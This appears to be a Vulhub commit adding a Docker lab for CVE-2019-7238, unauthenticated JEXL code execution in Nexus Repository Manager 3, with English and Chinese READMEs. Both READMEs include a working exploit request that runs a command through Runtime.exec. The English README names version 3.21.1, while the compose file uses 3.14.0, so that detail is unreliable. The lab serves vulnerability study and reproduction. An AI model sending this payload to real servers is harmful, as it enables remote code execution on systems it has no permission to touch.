first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

BIN
nexus/CVE-2019-7238/1.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 46 KiB

BIN
nexus/CVE-2019-7238/2.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.1 KiB

BIN
nexus/CVE-2019-7238/3.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 79 KiB

View File

@@ -0,0 +1,58 @@
# Nexus Repository Manager 3 Unauthenticated Remote Code Execution (CVE-2019-7238)
[中文版本(Chinese version)](README.zh-cn.md)
Nexus Repository Manager is a repository manager that organizes, stores and distributes artifacts needed for development.
In the version <= 3.14.0, insufficient access control and JEXL expression injection issue have been discovered in Nexus Repository 3 that allows for an unauthenticated attacker to execute arbitrary code by crafting a malicious request to Nexus Repository.
References:
- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
- https://xz.aliyun.com/t/4136
- https://www.anquanke.com/post/id/171116
- http://commons.apache.org/proper/commons-jexl/
## Vulnerable environment
Execute following command to start a Nexus Repository Manager version 3.21.1:
```
docker compose up -d
```
After the server is started, browse `http://your-ip:8081` to see the home page of Nexus. Login the admin panel with account `admin:admin123` and finish the initialize wizard.
Then, upload a JAR package through maven-releases:
![](1.png)
To exploit this issue, Nexus Repository should have at least one package.
## Exploit
Send following request to execute `touch /tmp/success` command, no authentication needed:
```
POST /service/extdirect HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 368
Connection: close
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
```
As you can see, `/tmp/success` is executed:
![](2.png)
The principle is that the JEXL expression in the expression position is executed, please refer to the documentation for details.
Use BCEL classloader to archive printable response:
![](3.png)

View File

@@ -0,0 +1,54 @@
# Nexus Repository Manager 3 远程命令执行漏洞CVE-2019-7238
Nexus Repository Manager 3 是一款软件仓库可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能而这处功能存在未授权访问漏洞将可以导致任意命令执行漏洞。
参考链接:
- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
- https://xz.aliyun.com/t/4136
- https://www.anquanke.com/post/id/171116
- http://commons.apache.org/proper/commons-jexl/
## 环境搭建
执行如下命令启动Nexus Repository Manager 3.14.0
```
docker compose up -d
```
等待一段时间环境才能成功启动,访问`http://your-ip:8081`即可看到Web页面。
使用账号密码`admin:admin123`登录后台然后在maven-releases下随便上传一个jar包
![](1.png)
触发该漏洞,必须保证仓库里至少有一个包存在。
## 漏洞复现
接口没有校验权限,所以直接发送如下数据包,即可执行`touch /tmp/success`命令:
```
POST /service/extdirect HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 368
Connection: close
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
```
可见,`/tmp/success`已成功执行:
![](2.png)
原理是expression位置的JEXL表达式被执行详情可阅读参考文档。
利用classloader加载字节码即可获得回显
![](3.png)

View File

@@ -0,0 +1,7 @@
version: '3'
services:
web:
image: vulhub/nexus:3.14.0
ports:
- "8081:8081"
- "5005:5005"